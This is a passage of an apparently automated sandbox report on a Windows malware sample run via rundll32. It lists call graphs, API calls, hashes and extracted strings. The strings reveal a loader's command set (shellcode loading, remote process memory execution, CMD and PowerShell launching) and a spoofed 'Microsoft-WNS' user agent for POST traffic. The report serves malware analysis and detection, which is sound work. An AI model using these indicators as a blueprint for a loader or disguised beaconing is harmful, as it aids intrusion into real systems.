7ef0cad9 43680->43681 43682 7ef0ca54 swprintf 43680->43682 43681->43615 43720 7ef4d78c 44 API calls 43682->43720 43685 7ef1793b 43684->43685 43686 7ef1793f GetLastError 43684->43686 43685->43619 43685->43620 43686->43685 43687 7ef1794c CloseHandle 43686->43687 43687->43685 43688->43623 43689->43625 43691 7ef022ce 43690->43691 43692 7ef022bc 43690->43692 43691->43629 43706 7ef01f50 GetPEB 43691->43706 43716 7ef3c370 GetPEB 43692->43716 43695 7ef0fe5d 43694->43695 43696 7ef0fdd8 swprintf 43694->43696 43695->43652 43717 7ef4d78c 44 API calls 43696->43717 43699 7ef0232e 43698->43699 43700 7ef0231c 43698->43700 43699->43656 43712 7ef0d490 44 API calls swprintf 43699->43712 43718 7ef3c370 GetPEB 43700->43718 43703 7ef104c5 43702->43703 43705 7ef10440 swprintf 43702->43705 43703->43660 43719 7ef4d78c 44 API calls 43705->43719 43706->43629 43707->43633 43708->43640 43709->43641 43710->43645 43711->43649 43712->43659 43713->43656 43714->43666 43715->43664 43716->43691 43717->43695 43718->43699 43719->43703 43720->43681 43721 6cc6bc50 43722 6cc6be36 43721->43722 43734 6cc510e0 43722->43734 43724 6cc6c2f9 43737 6cc51410 StrCmpIW 43724->43737 43726 6cc6c308 43738 6cc51770 StrCmpIW 43726->43738 43728 6cc6bebc 43728->43724 43729 6cc6c15c 43728->43729 43730 6cc6c193 GetWindowsDirectoryW 43729->43730 43731 6cc6c1ac 43729->43731 43730->43731 43732 6cc6c1d8 lstrlenA 43731->43732 43733 6cc6c252 43731->43733 43732->43733 43739 6cc51120 43734->43739 43736 6cc5110e CreateThread 43736->43728 43746 6cc5e190 43736->43746 43737->43726 43738->43733 43742 6cc51800 43739->43742 43741 6cc5112e 43741->43736 43745 6cc69b90 GetPEB 43742->43745 43744 6cc5180c 43744->43741 43745->43744 43747 6cc5e363 43746->43747 43747->43747

                          Executed Functions

                          Function 7EF22A30 Relevance: 2.1, APIs: 1, Instructions: 611COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 35 7ef22a30-7ef22a6d call 7ef0f6b0 38 7ef22a78-7ef22a7c 35->38 39 7ef22ac2-7ef22b4e GetPEB 38->39 40 7ef22a7e-7ef22ac0 38->40 42 7ef22b51-7ef22bac 39->42 40->38 43 7ef22bba 42->43 44 7ef22bae-7ef22bb8 42->44 45 7ef22bc4-7ef22bd3 43->45 44->45 46 7ef22bd9-7ef22bdf 45->46 47 7ef22cbc-7ef22ce6 45->47 49 7ef22be2-7ef22bfb 46->49 47->42 48 7ef22cec 47->48 50 7ef22cf6-7ef22d4b call 7ef0cbf0 48->50 49->47 51 7ef22c01-7ef22c22 49->51 61 7ef22d56-7ef22d5a 50->61 52 7ef22c29-7ef22c40 51->52 53 7ef22c42-7ef22c6a 52->53 54 7ef22c4d-7ef22c5e 52->54 58 7ef22cb7 53->58 59 7ef22c6c-7ef22cb5 53->59 54->52 58->49 59->50 62 7ef22da0-7ef22e2c GetPEB 61->62 63 7ef22d5c-7ef22d9e 61->63 64 7ef22e32-7ef22e90 62->64 63->61 66 7ef22e92-7ef22e9c 64->66 67 7ef22e9e 64->67 68 7ef22ea8-7ef22eb7 66->68 67->68 69 7ef22fb8-7ef22fe8 68->69 70 7ef22ebd-7ef22ec3 68->70 69->64 72 7ef22fee 69->72 71 7ef22ec6-7ef22edf 70->71 71->69 73 7ef22ee5-7ef22f09 71->73 74 7ef22ff8-7ef23079 GetPEB 72->74 75 7ef22f13-7ef22f33 73->75 79 7ef2307f-7ef230dd 74->79 77 7ef22f43-7ef22f5a 75->77 78 7ef22f35-7ef22f66 75->78 77->75 83 7ef22fb3 78->83 84 7ef22f68-7ef22fb1 78->84 81 7ef230eb 79->81 82 7ef230df-7ef230e9 79->82 85 7ef230f5-7ef23104 81->85 82->85 83->71 84->74 86 7ef23205-7ef23235 85->86 87 7ef2310a-7ef23110 85->87 86->79 88 7ef2323b 86->88 89 7ef23113-7ef2312c 87->89 90 7ef23245-7ef2329a GetPEB 88->90 89->86 91 7ef23132-7ef23156 89->91 96 7ef232a0-7ef232fe 90->96 92 7ef23160-7ef23180 91->92 94 7ef23182-7ef231b3 92->94 95 7ef23190-7ef231a7 92->95 100 7ef23200 94->100 101 7ef231b5-7ef231fe 94->101 95->92 98 7ef23300-7ef2330a 96->98 99 7ef2330c 96->99 102 7ef23316-7ef23325 98->102 99->102 100->89 101->90 103 7ef23426-7ef23456 102->103 104 7ef2332b-7ef23331 102->104 103->96 105 7ef2345c 103->105 106 7ef23334-7ef2334d 104->106 107 7ef23466-7ef23475 PathIsDirectoryW 105->107 106->103 108 7ef23353-7ef23377 106->108 109 7ef23477-7ef2347c 107->109 110 7ef2347e 107->110 111 7ef23381-7ef233a1 108->111 112 7ef23480-7ef23483 109->112 110->112 113 7ef233a3-7ef233d4 111->113 114 7ef233b1-7ef233c8 111->114 116 7ef23421 113->116 117 7ef233d6-7ef2341f 113->117 114->111 116->106 117->107
                          APIs
                          • PathIsDirectoryW.SHLWAPI(?), ref: 7EF2346D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryPath
                          • String ID:
                          • API String ID: 1580926078-0
                          • Opcode ID: bf1bc74431eba1dd0ce361fecfd5d007c7911795e9097ea6343043ab206bce54
                          • Instruction ID: 53824d59138f5d857152227a3b5a9010c971335db77ea8d8530e77c39db84e68
                          • Opcode Fuzzy Hash: bf1bc74431eba1dd0ce361fecfd5d007c7911795e9097ea6343043ab206bce54
                          • Instruction Fuzzy Hash: 88727A78E05269CBDB69CF58C990BDDBBB1BF89304F1081EAD849A7345D730AA85CF50
                          Function 7EF4AFE0 Relevance: 1.8, APIs: 1, Instructions: 347COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 118 7ef4afe0-7ef4aff3 call 7ef17a60 121 7ef4b512-7ef4b517 118->121 122 7ef4aff9-7ef4b000 call 7ef22a30 118->122 123 7ef4b51b-7ef4b51e 121->123 126 7ef4b006-7ef4b035 call 7ef0c9e0 122->126 127 7ef4b509-7ef4b50e 122->127 130 7ef4b037-7ef4b054 call 7ef23490 126->130 131 7ef4b058-7ef4b09e GetPEB 126->131 127->123 130->131 132 7ef4b0a1-7ef4b0f6 131->132 134 7ef4b101 132->134 135 7ef4b0f8-7ef4b0ff 132->135 137 7ef4b108-7ef4b114 134->137 135->137 138 7ef4b1e8-7ef4b212 137->138 139 7ef4b11a-7ef4b120 137->139 138->132 141 7ef4b218 138->141 140 7ef4b123-7ef4b136 139->140 140->138 142 7ef4b13c-7ef4b157 140->142 143 7ef4b21f-7ef4b24e call 7ef17920 141->143 144 7ef4b15e-7ef4b175 142->144 153 7ef4b250-7ef4b252 ExitProcess 143->153 154 7ef4b258-7ef4b30c GetPEB 143->154 146 7ef4b177-7ef4b199 144->146 147 7ef4b17f-7ef4b190 144->147 151 7ef4b1e3 146->151 152 7ef4b19b-7ef4b1e1 146->152 147->144 151->140 152->143 155 7ef4b30f-7ef4b36a 154->155 156 7ef4b375 155->156 157 7ef4b36c-7ef4b373 155->157 158 7ef4b37c-7ef4b388 156->158 157->158 159 7ef4b46e-7ef4b498 158->159 160 7ef4b38e-7ef4b394 158->160 159->155 161 7ef4b49e 159->161 162 7ef4b397-7ef4b3b0 160->162 163 7ef4b4a5-7ef4b519 call 7ef02100 call 7ef02370 161->163 162->159 164 7ef4b3b6-7ef4b3d7 162->164 163->123 165 7ef4b3de-7ef4b3f5 164->165 167 7ef4b3f7-7ef4b41f 165->167 168 7ef4b402-7ef4b413 165->168 171 7ef4b421-7ef4b467 167->171 172 7ef4b469 167->172 168->165 171->163 172->162
                          APIs
                            • Part of subcall function 7EF23490: __aullrem.LIBCMT ref: 7EF234E5
                            • Part of subcall function 7EF17920: CreateMutexA.KERNEL32(00000000,00000001,7EF4B249,?,?,7EF4B249,?), ref: 7EF1792C
                          • ExitProcess.KERNEL32 ref: 7EF4B252
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateExitMutexProcess__aullrem
                          • String ID:
                          • API String ID: 1029110445-0
                          • Opcode ID: 585f7e072baeb3186479d2a99c1aefe3792052cf2d9243800b08dc924792d253
                          • Instruction ID: 3b126db3b5785efe1d144964d5fd359c6bfc4c98bf20f633153cd7e8c829065d
                          • Opcode Fuzzy Hash: 585f7e072baeb3186479d2a99c1aefe3792052cf2d9243800b08dc924792d253
                          • Instruction Fuzzy Hash: 9202B1B8E04259DFDB14CF99C890BEDBBB2BF89304F10819AD819A7755D730AA85CF50
                          Function 7EF17920 Relevance: 4.5, APIs: 3, Instructions: 25synchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 29 7ef17920-7ef17939 CreateMutexA 30 7ef1793b-7ef1793d 29->30 31 7ef1793f-7ef1794a GetLastError 29->31 32 7ef1795f-7ef17962 30->32 33 7ef1795a 31->33 34 7ef1794c-7ef17958 CloseHandle 31->34 33->32 34->32
                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,7EF4B249,?,?,7EF4B249,?), ref: 7EF1792C
                          • GetLastError.KERNEL32(?,?,7EF4B249), ref: 7EF1793F
                          • CloseHandle.KERNEL32(00000000,?,?,7EF4B249), ref: 7EF17950
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateErrorHandleLastMutex
                          • String ID:
                          • API String ID: 4294037311-0
                          • Opcode ID: 437136c6e1f79b0e280a3f3faad2e6c2c3ecbe9000503b55f180c822fca5219a
                          • Instruction ID: b903ca2c22f7542ebc5aaad78bc3ff8a01b2535a948ce5c8172aa61916dd27b8
                          • Opcode Fuzzy Hash: 437136c6e1f79b0e280a3f3faad2e6c2c3ecbe9000503b55f180c822fca5219a
                          • Instruction Fuzzy Hash: 5CE0DF7A61820EFFD700ABA5C828B4D37BAEB4A311F900854F90FD79C0F6758E448B61
                          Function 6CC510E0 Relevance: 1.5, APIs: 1, Instructions: 26threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 180 6cc510e0-6cc51113 call 6cc51120 CreateThread
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,6CC53A50,00000000,6CC6BEBC,?,?,?,6CC6BEBC,00000000,00000000,6CC53A50,00000000,00000000,00000000), ref: 6CC5110E
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210625828.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000003.00000002.2210605097.000000006CC50000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210655307.000000006CC83000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210672778.000000006CC91000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210777648.000000006CF27000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210910682.000000006D0F9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210926789.000000006D0FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: f63af93a669a942de1f5ae3a2043a18d49d354450eca9fad240067c5be96da76
                          • Instruction ID: 99e22695e0263dee8e255a69c831648d62181b2f508f1cf227a4b5e4913b25e9
                          • Opcode Fuzzy Hash: f63af93a669a942de1f5ae3a2043a18d49d354450eca9fad240067c5be96da76
                          • Instruction Fuzzy Hash: 8CF04EB4604209AF8748DF99D890D9BB7B9EF8D350B108299BC19C7350DA31E921CBA5

                          Non-executed Functions

                          Function 7EF19480 Relevance: 28.1, Strings: 20, Instructions: 3113COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 261 7ef19480-7ef195dc call 7ef4ba88 call 7ef3fbf0 call 7ef07930 call 7ef08730 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef35f00 286 7ef195e0-7ef195e7 261->286 287 7ef1c484-7ef1c4be call 7ef09520 call 7ef09df0 call 7ef09d20 286->287 288 7ef195ed-7ef19610 call 7eef46c0 call 7eef45d0 286->288 298 7ef1c105-7ef1c271 call 7ef06a80 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef0a050 GetPEB 288->298 299 7ef19616-7ef19639 call 7eef46c0 call 7eef43b0 288->299 392 7ef1c277-7ef1c2e4 298->392 309 7ef1995a-7ef1997d call 7eef46c0 call 7eef43b0 299->309 310 7ef1963f-7ef19697 call 7eef46c0 call 7eefd4a0 call 7ef29020 299->310 326 7ef19983-7ef199dd call 7eef46c0 call 7eefd4a0 call 7ef2a980 309->326 327 7ef19ca2-7ef19cc5 call 7eef46c0 call 7eef43b0 309->327 333 7ef197fd-7ef19955 call 7eef46c0 call 7eefd4a0 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef22480 call 7ef25ea0 310->333 334 7ef1969d-7ef197f8 call 7eef46c0 call 7eefd4a0 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef22480 call 7ef25ea0 310->334 361 7ef199e3-7ef19b40 call 7eef46c0 call 7eefd4a0 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef22480 call 7ef25ea0 326->361 362 7ef19b45-7ef19c9d call 7eef46c0 call 7eefd4a0 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef22480 call 7ef25ea0 326->362 351 7ef19ccb-7ef19d04 call 7eef46c0 call 7eef4850 call 7ef2c2e0 327->351 352 7ef19f6c-7ef19f8f call 7eef46c0 call 7eef43b0 327->352 333->309 334->309 397 7ef19d0a-7ef19e39 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 351->397 398 7ef19e3e-7ef19f67 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 351->398 383 7ef1a235-7ef1a258 call 7eef46c0 call 7eef43b0 352->383 384 7ef19f95-7ef19fcd call 7eef46c0 call 7eef4850 call 7ef2e560 352->384 361->327 362->327 432 7ef1a4fe-7ef1a521 call 7eef46c0 call 7eef43b0 383->432 433 7ef1a25e-7ef1a296 call 7eef46c0 call 7eef4850 call 7ef306d0 383->433 455 7ef19fd3-7ef1a102 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 384->455 456 7ef1a107-7ef1a230 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 384->456 401 7ef1c2f2 392->401 402 7ef1c2e6-7ef1c2f0 392->402 397->352 398->352 410 7ef1c2fc-7ef1c30b 401->410 402->410 419 7ef1c311-7ef1c31a 410->419 420 7ef1c427-7ef1c457 410->420 430 7ef1c31d-7ef1c336 419->430 420->392 425 7ef1c45d 420->425 438 7ef1c467-7ef1c47f call 7eefd360 425->438 430->420 443 7ef1c33c-7ef1c369 430->443 490 7ef1a527-7ef1a56e call 7eef46c0 call 7eef4850 call 7ef458e0 call 7ef095b0 432->490 491 7ef1a7d6-7ef1a7f9 call 7eef46c0 call 7eef43b0 432->491 510 7ef1a3d0-7ef1a4f9 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 433->510 511 7ef1a29c-7ef1a3cb call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 433->511 438->286 457 7ef1c373-7ef1c393 443->457 455->383 456->383 470 7ef1c3a3-7ef1c3ba 457->470 471 7ef1c395-7ef1c3c6 457->471 470->457 483 7ef1c422 471->483 484 7ef1c3c8-7ef1c420 471->484 483->430 484->438 594 7ef1a574-7ef1a6a3 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 490->594 595 7ef1a6a8-7ef1a7d1 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 490->595 545 7ef1a7ff-7ef1a846 call 7eef46c0 call 7eef4850 call 7ef46d80 call 7ef095b0 491->545 546 7ef1aaae-7ef1aad1 call 7eef46c0 call 7eef43b0 491->546 510->432 511->432 653 7ef1a980-7ef1aaa9 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 545->653 654 7ef1a84c-7ef1a97b call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 545->654 612 7ef1ad77-7ef1ad9a call 7eef46c0 call 7eef43b0 546->612 613 7ef1aad7-7ef1ab0f call 7eef46c0 call 7eef4850 call 7ef1c820 546->613 594->491 595->491 669 7ef1b040-7ef1b063 call 7eef46c0 call 7eef43b0 612->669 670 7ef1ada0-7ef1add8 call 7eef46c0 call 7eef4850 call 7ef1c4d0 612->670 683 7ef1ab15-7ef1ac44 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 613->683 684 7ef1ac49-7ef1ad72 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 613->684 653->546 654->546 721 7ef1b309-7ef1b32c call 7eef46c0 call 7eef43b0 669->721 722 7ef1b069-7ef1b0a1 call 7eef46c0 call 7eef4850 call 7ef1d3b0 669->722 750 7ef1af12-7ef1b03b call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 670->750 751 7ef1adde-7ef1af0d call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 670->751 683->612 684->612 778 7ef1b5d2-7ef1b5f5 call 7eef46c0 call 7eef43b0 721->778 779 7ef1b332-7ef1b36a call 7eef46c0 call 7eef4850 call 7ef16bd0 721->779 803 7ef1b0a7-7ef1b1d6 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 722->803 804 7ef1b1db-7ef1b304 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 722->804 750->669 751->669 833 7ef1b89b-7ef1b8be call 7eef46c0 call 7eef43b0 778->833 834 7ef1b5fb-7ef1b633 call 7eef46c0 call 7eef4850 call 7ef16a20 778->834 861 7ef1b370-7ef1b49f call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 779->861 862 7ef1b4a4-7ef1b5cd call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 779->862 803->721 804->721 904 7ef1bb64-7ef1bb87 call 7eef46c0 call 7eef43b0 833->904 905 7ef1b8c4-7ef1b8fc call 7eef46c0 call 7eef4850 call 7ef1cb70 833->905 921 7ef1b639-7ef1b768 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 834->921 922 7ef1b76d-7ef1b896 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 834->922 861->778 862->778 960 7ef1be2d-7ef1be50 call 7eef46c0 call 7eef43b0 904->960 961 7ef1bb8d-7ef1bbc5 call 7eef46c0 call 7eef4850 call 7ef1d230 904->961 976 7ef1b902-7ef1ba31 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 905->976 977 7ef1ba36-7ef1bb5f call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 905->977 921->833 922->833 960->298 1014 7ef1be56-7ef1be9d call 7eef46c0 call 7eef4850 call 7ef17690 call 7ef095b0 960->1014 1038 7ef1bbcb-7ef1bcfa call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 961->1038 1039 7ef1bcff-7ef1be28 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 961->1039 976->904 977->904 1104 7ef1bea3-7ef1bfd2 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 1014->1104 1105 7ef1bfd7-7ef1c100 call 7eef46c0 call 7eef4850 call 7ef06650 * 4 call 7ef39aa0 call 7ef06650 * 2 call 7ef3e200 call 7ef09520 1014->1105 1038->960 1039->960 1104->298 1105->298
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: Dll launch(Regsvr32)$Dll launch(RunDll32)$ExecuteDllRemoteProcessMemory$ExecuteRemoteProcessMemory$Install MSI Package$Launch command CMD$Launch command PS$Launch console exe$Launch exe$Launch with privileges$Loader bin shellCode$Loader bin shellCode #2$PeLoader Dll & EXE$PeLoader Dll Start$PeLoader Dll dllregisterserver$TPd$VQmR$cKC$paU$}
                          • API String ID: 2807920213-484686173
                          • Opcode ID: e7fb9bf7739274294c8fb881eb76ab9ad669c640310a6cb55279103a1f2cd14c
                          • Instruction ID: 70caca8d0e926edb2ec3472326d03ea1dc1c9b6d5ddfba43360799a283c9fef7
                          • Opcode Fuzzy Hash: e7fb9bf7739274294c8fb881eb76ab9ad669c640310a6cb55279103a1f2cd14c
                          • Instruction Fuzzy Hash: D46369B5D05258DACF10EFB8CD55BDEBBB4AB49300F5086CED00DA7681EA345B849F92
                          Function 7EF41890 Relevance: 15.4, APIs: 2, Strings: 5, Instructions: 3140COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EEF3EA0: std::ios_base::clear.LIBCPMTD ref: 7EEF430A
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7EF454BB
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7EF45507
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Ios_base_dtorstd::ios_base::_$std::ios_base::clear
                          • String ID: $Microsoft-WNS/10.0$POST$User-Agent: Microsoft-WNS/10.0Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CA$}>
                          • API String ID: 4121727721-2552320425
                          • Opcode ID: d86564d3196835405a4a271687f71fddc5a521cc2aefccc10c5bd6e035821338
                          • Instruction ID: 3783de1bf695792711c1fe80bca41374bef8ac178c83ba59e57fee2edd2851c6
                          • Opcode Fuzzy Hash: d86564d3196835405a4a271687f71fddc5a521cc2aefccc10c5bd6e035821338
                          • Instruction Fuzzy Hash: C7837D78E05269CFDB65CF18C9A0B99BBB1BB89304F1081DAD84DA7345DB31AE85CF50
                          Function 7EF17A60 Relevance: 11.0, Strings: 8, Instructions: 959COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +$/$9$Z$i$j$p$v
                          • API String ID: 0-930883352
                          • Opcode ID: 7c04b7466646c7d6eee6ce41d1066afcb718d3f62b0b7957e220ef7f92e70d1b
                          • Instruction ID: 18017caf1ac9e280d3942e453c96e2212cbb527d32ed103e94b6c76f9c30b86d
                          • Opcode Fuzzy Hash: 7c04b7466646c7d6eee6ce41d1066afcb718d3f62b0b7957e220ef7f92e70d1b
                          • Instruction Fuzzy Hash: 93A2E234A14269CADB25CF64D8507DEB7B2EF99300F1080E9D40DAB3A0EB755E85CF56
                          Function 7EF692AF Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 4168288129-2761157908
                          • Opcode ID: 3d51ad6e9845e0476980bd46d4c6206d3101edd4b32a4327fb2a151a80f7d553
                          • Instruction ID: de7d3df3a71e7a24c4f473bd4d10f00d37f8229ae6e0be4d7ce5df9b2cf2ea6b
                          • Opcode Fuzzy Hash: 3d51ad6e9845e0476980bd46d4c6206d3101edd4b32a4327fb2a151a80f7d553
                          • Instruction Fuzzy Hash: CBD22676E09628CFDB25CE28CD607DAB7F5EB44304F1445EAD80EA7640E779AE818F41
                          Function 7EF458E0 Relevance: 9.9, Strings: 7, Instructions: 1104COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J$C:\Windows\System32\cmd.exe /c $D$e$e$e$e
                          • API String ID: 0-3866922558
                          • Opcode ID: 27896858c1f29ef401eb0468da4fbe651f004453516814caa6d7fceb143151f8
                          • Instruction ID: 2c6541ebec087a26329a79ec96510f962d6601645c671807d4c280ef8e6b4680
                          • Opcode Fuzzy Hash: 27896858c1f29ef401eb0468da4fbe651f004453516814caa6d7fceb143151f8
                          • Instruction Fuzzy Hash: F3E28CB8E05269CFDB69CF58C8A4B9DBBB1BF49304F1081DAD849A7355D730AA81CF50
                          Function 7EF676EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoW.KERNEL32(?,2000000B,7EF67A08,00000002,00000000,?,?,?,7EF67A08,?,00000000), ref: 7EF67783
                          • GetLocaleInfoW.KERNEL32(?,20001004,7EF67A08,00000002,00000000,?,?,?,7EF67A08,?,00000000), ref: 7EF677AC
                          • GetACP.KERNEL32(?,?,7EF67A08,?,00000000), ref: 7EF677C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: e3b2605468ff3261e3119afe5e9a0986c589d1374e7e8179f8751a074f591628
                          • Instruction ID: 0376cf80bd7ac030bbd91e1b1935ccd9fddba6bfcdc37e2817c1cd6bcdea6606
                          • Opcode Fuzzy Hash: e3b2605468ff3261e3119afe5e9a0986c589d1374e7e8179f8751a074f591628
                          • Instruction Fuzzy Hash: 0921922E610101EBD7169F25CA21B8B73F7BB44E60BD28424E907CFA88FB32D941C790
                          Function 7EF3E200 Relevance: 7.7, Strings: 5, Instructions: 1452COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
